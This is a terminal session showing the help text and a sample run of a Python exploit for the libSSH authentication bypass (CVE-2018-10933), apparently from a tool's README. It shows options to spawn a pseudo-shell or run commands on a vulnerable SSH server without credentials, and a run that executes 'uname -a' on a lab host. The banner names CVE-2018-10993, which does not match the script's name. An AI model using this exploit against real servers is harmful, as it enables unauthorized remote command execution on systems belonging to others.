$ python3 cve-2018-10933.py -h
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
usage: cve-2018-10933.py [-h] [-p PORT] [-s] [-c COMMAND] [--logfile LOGFILE]
[-v] [-d]
host
If there was neither shell nor command option specified - exploit will switch
to detect mode yielding vulnerable/not vulnerable flag.
positional arguments:
host Hostname/IP address that is running vulnerable libSSH
server.
optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT libSSH port
-s, --shell Exploit the vulnerability and spawn pseudo-shell
-c COMMAND, --command COMMAND
Execute single command.
--logfile LOGFILE Logfile to write paramiko connection logs
-v, --verbose Display verbose output.
-d, --debug Display debug output.
$ python3 cve-2018-10933.py 192.168.56.100 -v -c 'uname -a'
:: CVE-2018-10993 libSSH authentication bypass exploit.
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
v0.1
[+] Connected to the target: 192.168.56.100:22
[?] Obtained banner: "SSH-2.0-libssh_0.8.3"
[+] Target seems to be VULNERABLE!
[?] Connecting with 192.168.56.100:22 ...
[+] Connected.
$ uname -a
Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux